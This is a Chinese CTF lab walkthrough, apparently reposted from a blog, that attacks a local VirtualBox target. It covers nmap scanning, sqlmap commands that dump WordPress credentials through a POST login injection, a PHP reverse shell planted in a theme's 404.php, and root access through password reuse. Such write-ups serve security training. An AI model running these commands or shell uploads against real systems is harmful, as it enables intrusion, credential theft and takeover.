ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

CTF-SQL注入(POST)

2020-12-23 14:30:40  阅读:363  来源: 互联网

标签:sqlmap 登录 -- 192.168 漏洞 CTF SQL 网站 POST


实验环境:

攻击者:Kali Linux(192.168.0.10)
靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(32-bit)(192.168.0.250)

实验流程:

  1. 信息探测
    检测与靶机的网络连通性
    在这里插入图片描述
    端口扫描,服务探测
    在这里插入图片描述
    详细信息扫描
    命令:nmap -A -v -T4 192.168.0.250
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
    对80端口的web服务进行目录扫描
    在这里插入图片描述在这里插入图片描述
    通过目录扫描发现一个phpmyadmin和登录页面login.php
    在这里插入图片描述在这里插入图片描述
    登录页面没有验证码和防爆破机制,可以进行暴力破解。登录页面也可能存在SQL注入漏洞
    对8080端口对应的web网站进行目录扫描,该网站使用WordPress作为建站系统
    在这里插入图片描述
    对于使用了建站系统的网站,可以利用其公开漏洞getshell,但大多数能够getshell的漏洞基本都属于后台漏洞。可以探测网站中是否存在SQL注入漏洞,利用SQL注入漏洞获取网站后台登录密码,利用WordPress的公开漏洞getshell。
  2. 对登录页面(http://192.168.0.250/login.php)进行SQL注入测试
    工具:sqlmap
    利用BP获取登录页面对应的请求消息
    对浏览器设置代理服务器:127.0.0.1:8080
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
    打开Bp,开启流量监听功能
    在这里插入图片描述
    随意输入用户名和密码,点击登录/提交,发送请求
    在这里插入图片描述
    获取请求流量
    在这里插入图片描述
    将请求消息写入到一个文件并且复制到kali,利用sqlmap进行检测
    命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch –dbs
    在这里插入图片描述
    结果分析:请求数据中的user字段可能存在注入点,类型为字符型,POST请求方式,注入手法为延时注入。获取到的数据库名如下
    在这里插入图片描述
    结果分析:其中WordPress8080可能为8080端口对应的网站的后台数据库,尝试获取其中的数据表。
    命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch -D wordpress8080 –tables
    在这里插入图片描述
    结果分析:其中有一个表名users,极有可能存储了网站后台用户的账号密码。获取该表中的字段。
    命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch -D wordpress8080 -T users –columns
    在这里插入图片描述
    获取数据表中的数据
    命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch -D wordpress8080 -T users -C username,password --dump
    在这里插入图片描述
    使用该用户名和密码登录网站后台
    在这里插入图片描述
    登录成功
    在这里插入图片描述
  3. 漏洞利用
    在这里插入图片描述在这里插入图片描述
    在kali中获取反弹shell的PHP脚本
    在这里插入图片描述
    修改接收shell的IP地址和端口号
    在这里插入图片描述
    kali监听端口
    在这里插入图片描述
    上传木马
    在这里插入图片描述
    访问该404页面,
    http://192.168.0.250:8080/wordpress/wp-content/themes/twentythirteen/404.php
    注意网站的IP地址和主题数字,访问成功后即反弹回shell
    在这里插入图片描述
  4. 权限提升
    查看当前权限,程序用户
    在这里插入图片描述
    优化shell
    在这里插入图片描述
    尝试切换为root用户,使用网站后台登录密码进行登录
    在这里插入图片描述
    提权成功

标签:sqlmap,登录,--,192.168,漏洞,CTF,SQL,网站,POST
来源: https://blog.csdn.net/su__xiaoyan/article/details/111588282

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有